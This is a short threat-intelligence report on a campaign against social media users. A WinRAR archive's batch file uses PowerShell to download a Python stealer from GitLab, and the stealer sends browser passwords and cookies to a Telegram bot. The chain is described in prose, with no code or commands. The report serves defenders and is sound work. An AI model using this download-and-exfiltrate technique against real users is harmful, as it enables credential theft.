Key takeaways from Cyble Research and Intelligence Labs (CRIL) recently discovered a WinRAR archive file on VirusTotal with minimal detection. Further analysis revealed that it is part of a new campaign targeting Social Media users. The campaign involves a multi-stage attack with distinct roles such as evading detection, downloading additional payloads, or gaining persistence on the victim’s system. Threat Actors (TAs) use open-source code-sharing platforms like Gitlab to retrieve the next stage payloads. The downloaded payload is a new Python-based stealer designed to pilfer process information and browser-stored data like Passwords, cookies, Web data, and others and use the Telegram channel to send the stolen information to the TAs.
On December 5th, CRIL came across a potentially malicious RAR file on VirusTotal and similar files began surfacing within a short timeframe. The investigation revealed that the identified archive file is linked to an ongoing scam targeting Social Media users, where TAs exploit the appeal of well-known products and compelling content to lure users into interacting with deceptive pages or groups. The RAR archive files contain a first-stage malicious batch file and a JSON file. The TAs use the batch file to execute a multi-stage infection strategy to deliver their final payload onto the victim’s system. The final payload is a Windows-specific Python-based stealer designed to collect various sensitive information and transmit it to a Telegram bot managed by the TAs.
When executing the batch file, it uses PowerShell commands to perform various download activities in the system, including retrieving a ZIP file from an open-source code-sharing platform, unzipping the contents, and executing the Python script named “libb1.py”. This Python script is a sophisticated piece of malware designed to collect sensitive information from various browsers and sending them to a specified TAs Telegram channel. The script gathers processes, login details, and cookie information from different browsers and sends them to the TAs.
This incident serves as another instance highlighting the ongoing threat to Social Media users from malicious campaigns targeting their personal information.